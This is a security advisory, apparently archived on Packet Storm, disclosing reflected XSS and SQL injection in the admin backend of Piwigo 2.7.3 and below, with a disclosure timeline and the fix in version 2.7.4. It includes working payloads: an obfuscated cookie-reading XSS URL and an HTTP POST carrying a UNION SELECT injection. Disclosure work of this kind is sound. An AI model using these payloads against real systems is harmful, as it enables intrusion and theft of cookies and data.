what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

CMS Piwigo 2.7.3 Cross Site Scripting / SQL Injection

CMS Piwigo 2.7.3 Cross Site Scripting / SQL Injection
Posted Feb 18, 2015
Authored by Steffen Roesemann

CMS Piwigo versions 2.7.3 and below suffer from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | a239ce6003e18af06c3d05e3db3bc45937ee44ec70f7ce065e378520fa3c3ef1

CMS Piwigo 2.7.3 Cross Site Scripting / SQL Injection

Change Mirror Download
Advisory: Reflecting XSS- and SQL Injection vulnerability in CMS Piwigo <=
v. 2.7.3
Advisory ID: SROEADV-2015-06
Author: Steffen Rösemann
Affected Software: CMS Piwigo <= v. 2.7.3 (Release date: 9th January 2015)
Vendor URL: http://piwigo.org
Vendor Status: patched
CVE-ID: -

==========================
Vulnerability Description:
==========================

Piwigo <= v. 2.7.3 suffers from a reflecting XSS and a SQL injection in its
administrative backend.

==================
Technical Details:
==================

The reflecting XSS vulnerability resides in the "page" parameter used in
the file admin.php which can be found in the administrative backend located
here in a common Piwigo installation:

http://{TARGET}/admin.php?page=plugin-AdminTools

Exploit-Example:

http://
{TARGET}/admin.php?page=plugin-AdminTools%3Cimg%20src=n%20onerror=eval%28String.fromCharCode%2897,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59%29%29%20%3E

The SQL injection vulnerability can as well be found in the administrative
backend and can be found in the "History" functionality located here:

http://{TARGET}/admin.php?page=history

The SQL injection vulnerability can be exploited by appending arbitrary SQL
statements in a POST request to the parameter "user":

Exploit-Example:

POST /piwigo/admin.php?page=history HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/piwigo/admin.php?page=history&search_id=82
Cookie: pwg_display_thumbnail=no_display_thumbnail;
pwg_id=19rpao6bhdsn3l0u0o1im4m680;
_pk_id.1.1fff=7588ea02f4577539.1420720532.1.1420720532.1420720532.
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 255

start=2015-01-08+&end=2015-01-09+&types%5B%5D=none&types%5B%5D=picture&types%5B%5D=high&types%5B%5D=other&user=2)
AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 --
&image_id=&filename=&ip=&display_thumbnail=no_display_thumbnail&submit=Submit

=========
Solution:
=========

Install the latest version 2.7.4 (released 17th February 2015).


====================
Disclosure Timeline:
====================
08-Jan-2015 – found the vulnerability
09-Jan-2015 - informed the developers
09-Jan-2015 – release date of this security advisory [without technical
details]
09-Jan-2015 - vendor responded, will work on a patch (released in v. 2.7.4)
17-Feb-2015 - vendor releases patch 2.7.4 (see [3])
17-Feb-2015 - release date of this security advisory
17-Feb-2015 - send to FullDisclosure

========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://piwigo.org
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-06.html
[3] http://piwigo.org/forum/viewtopic.php?id=25179


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close